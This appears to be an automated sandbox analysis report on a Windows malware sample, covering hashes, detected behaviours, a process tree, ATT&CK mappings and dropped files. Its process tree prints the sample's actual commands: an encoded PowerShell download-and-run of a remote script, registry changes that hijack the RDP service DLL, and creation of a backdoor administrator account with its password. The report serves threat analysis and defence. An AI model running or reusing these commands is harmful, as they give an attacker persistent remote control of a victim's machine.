Analysis

  • max time kernel
    48s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    16-06-2021 10:08

General

  • Target

    6efc7601be401f3e9b49f4f2cf63fee9.exe

  • Size

    6.0MB

  • MD5

    6efc7601be401f3e9b49f4f2cf63fee9

  • SHA1

    6c975b9f64a3e0840c43f11571bc4b1bccdc3d83

  • SHA256

    9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724

  • SHA512

    87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe
    "C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp" "c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP"
          4⤵
            PID:2284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3024
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3900
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2104
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1916
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2084
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2724
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3796
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2664
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2088
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2352
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4052
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3924
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1832
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:2180
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2528
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2124
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2104
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:4040
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc IUni1mTF /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1804
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc IUni1mTF /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3872
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF /add
                          3⤵
                            PID:2144
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3644
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3908
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:2388
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1516
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2804
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                              3⤵
                                PID:2104
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4040
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1240
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:3808
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc IUni1mTF
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2144
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc IUni1mTF
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:188
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF
                                  3⤵
                                    PID:2664
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3004
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:2064
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:2724
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:1240
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                    PID:2184
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                        PID:3104
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1252

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Persistence

                                    Account Manipulation

                                    1
                                    T1098

                                    Registry Run Keys / Startup Folder

                                    1
                                    T1060

                                    Defense Evasion

                                    Modify Registry

                                    2
                                    T1112

                                    Lateral Movement

                                    Remote Desktop Protocol

                                    1
                                    T1076

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp
                                      MD5

                                      265781461bd3699d32def7a26bf20ca6

                                      SHA1

                                      fba089c250f1712a5474ef73e562e145d8bb70a1

                                      SHA256

                                      eb78a1266e7a793b274a6cb70c2ad227fd5f680f5f5288698a57f980cb240085

                                      SHA512

                                      47907712aa99a3c6224b3c31d9054b8f374560a4e4d1c72cfce75448cb9d36c1eea61b4430dce2175b956299220954f31a183e9198fddb007b8393983eea5d8f

                                    • C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.dll
                                      MD5

                                      a9981347d273073186b0845494e154a4

                                      SHA1

                                      fc0cbb5b8532db34198eb41c4ff16bebbb85ba54

                                      SHA256

                                      ba9056f883562b52279660e0936afa214ca6b40a6af0efd64eaee466b057479b

                                      SHA512

                                      83f7dbc80197edcf170d3c766c2eaaebba5be43f9818763493aa90efc02e68c3917b2c67eddb6f5d8ac90399e660a3e58d3b2bfe311d948bf72c98bff1b96a8b

                                    • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                      MD5

                                      3447df88de7128bdc34942334b2fab98

                                      SHA1

                                      519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                      SHA256

                                      9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                      SHA512

                                      2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                    • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
                                      MD5

                                      7cc73f9b87540e85212f709eafca7ea8

                                      SHA1

                                      3f43a1e1044dfb8d3354f055a5461d265719fa0e

                                      SHA256

                                      7147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5

                                      SHA512

                                      c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3

                                    • \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP
                                      MD5

                                      b0b89925dbbeddc09c6af070ed3b73eb

                                      SHA1

                                      87fb0c632e90495b8e0beb1913db9228f8702e72

                                      SHA256

                                      1a095a8e9ed711a5570eae6eca259a0bcd64a42e75c3bd8bf9a3984c0fb89880

                                      SHA512

                                      2e31c1b2f4f98a51e500bad8eebfb0b001e908374eb9a9afbb8381df3d90d8d1966b5387ad210745fab841f24b8f744b8ebde308717efa59c8604820866e88b3

                                    • \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.0.cs
                                      MD5

                                      4864fc038c0b4d61f508d402317c6e9a

                                      SHA1

                                      72171db3eea76ecff3f7f173b0de0d277b0fede7

                                      SHA256

                                      0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                      SHA512

                                      9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                    • \??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline
                                      MD5

                                      cf56bdd57ce7b23167c75f86621d309a

                                      SHA1

                                      48a945bd148d833cc5f7b5c8d9e24cc625ebf5e8

                                      SHA256

                                      12d0f2ff7aaadc6fa960ed98cba20b02fb33cd0e790856cbe23cdff10899eab0

                                      SHA512

                                      571e6ab9fd7172eb5906cd227fcc4fbb79449c45c39e537699bb9e8d9127f1eb993ead99d067eeb6cc3060d655d6d411331dfb07d54f594a145759b4caa0c790

                                    • \Windows\Branding\mediasrv.png
                                      MD5

                                      590ae32e6e9072e2b0ad71650d787af9

                                      SHA1

                                      0ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7

                                      SHA256

                                      42d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc

                                      SHA512

                                      2b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b

                                    • \Windows\Branding\mediasvc.png
                                      MD5

                                      c4184e993992dc9b9bb7d2b536311f98

                                      SHA1

                                      fa3a97ac00dbdc7db025d40edf8013cc74d2244f

                                      SHA256

                                      81bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6

                                      SHA512

                                      d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19

                                    • memory/188-234-0x0000000000000000-mapping.dmp
                                    • memory/1156-171-0x000001C3BBFE3000-0x000001C3BBFE5000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1156-191-0x000001C3BBFE6000-0x000001C3BBFE8000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1156-170-0x000001C3BBFE0000-0x000001C3BBFE2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1156-160-0x0000000000000000-mapping.dmp
                                    • memory/1240-237-0x0000000000000000-mapping.dmp
                                    • memory/1240-232-0x0000000000000000-mapping.dmp
                                    • memory/1252-240-0x0000015000530000-0x0000015000532000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1252-243-0x0000015000538000-0x0000015000539000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1252-239-0x0000000000000000-mapping.dmp
                                    • memory/1252-241-0x0000015000533000-0x0000015000535000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1252-242-0x0000015000536000-0x0000015000538000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1832-204-0x000001EAC88E6000-0x000001EAC88E8000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1832-221-0x0000000000000000-mapping.dmp
                                    • memory/1832-200-0x0000000000000000-mapping.dmp
                                    • memory/1832-201-0x000001EAC88E0000-0x000001EAC88E2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1832-202-0x000001EAC88E3000-0x000001EAC88E5000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1832-205-0x000001EAC88E8000-0x000001EAC88EA000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1916-211-0x0000000000000000-mapping.dmp
                                    • memory/2064-236-0x0000000000000000-mapping.dmp
                                    • memory/2084-212-0x0000000000000000-mapping.dmp
                                    • memory/2088-217-0x0000000000000000-mapping.dmp
                                    • memory/2104-224-0x0000000000000000-mapping.dmp
                                    • memory/2104-231-0x0000000000000000-mapping.dmp
                                    • memory/2104-210-0x0000000000000000-mapping.dmp
                                    • memory/2144-227-0x0000000000000000-mapping.dmp
                                    • memory/2180-244-0x0000000000000000-mapping.dmp
                                    • memory/2284-140-0x0000000000000000-mapping.dmp
                                    • memory/2284-214-0x0000000000000000-mapping.dmp
                                    • memory/2352-218-0x0000000000000000-mapping.dmp
                                    • memory/2388-229-0x0000000000000000-mapping.dmp
                                    • memory/2528-245-0x0000000000000000-mapping.dmp
                                    • memory/2664-216-0x0000000000000000-mapping.dmp
                                    • memory/2664-235-0x0000000000000000-mapping.dmp
                                    • memory/2724-213-0x0000000000000000-mapping.dmp
                                    • memory/2804-230-0x0000000000000000-mapping.dmp
                                    • memory/2808-144-0x000001D4F7D70000-0x000001D4F7D71000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-151-0x000001D4F8610000-0x000001D4F8611000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-146-0x000001D4F7DC6000-0x000001D4F7DC8000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/2808-152-0x000001D4F89A0000-0x000001D4F89A1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-120-0x0000000000000000-mapping.dmp
                                    • memory/2808-126-0x000001D4F7D00000-0x000001D4F7D01000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-129-0x000001D4F8130000-0x000001D4F8131000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-130-0x000001D4F7DC0000-0x000001D4F7DC2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/2808-153-0x000001D4F7DC8000-0x000001D4F7DC9000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2808-131-0x000001D4F7DC3000-0x000001D4F7DC5000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3024-208-0x0000027359FA6000-0x0000027359FA8000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3024-206-0x0000027359FA0000-0x0000027359FA2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3024-203-0x0000000000000000-mapping.dmp
                                    • memory/3024-207-0x0000027359FA3000-0x0000027359FA5000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3104-238-0x0000000000000000-mapping.dmp
                                    • memory/3796-215-0x0000000000000000-mapping.dmp
                                    • memory/3808-233-0x0000000000000000-mapping.dmp
                                    • memory/3872-226-0x0000000000000000-mapping.dmp
                                    • memory/3896-114-0x000001D77DB50000-0x000001D77DF71000-memory.dmp
                                      Filesize

                                      4.1MB

                                    • memory/3896-119-0x000001D77D716000-0x000001D77D717000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3896-118-0x000001D77D715000-0x000001D77D716000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3896-117-0x000001D77D713000-0x000001D77D715000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3896-116-0x000001D77D710000-0x000001D77D712000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3900-209-0x0000000000000000-mapping.dmp
                                    • memory/3908-228-0x0000000000000000-mapping.dmp
                                    • memory/3924-220-0x0000000000000000-mapping.dmp
                                    • memory/4040-225-0x0000000000000000-mapping.dmp
                                    • memory/4052-219-0x0000000000000000-mapping.dmp
                                    • memory/4068-137-0x0000000000000000-mapping.dmp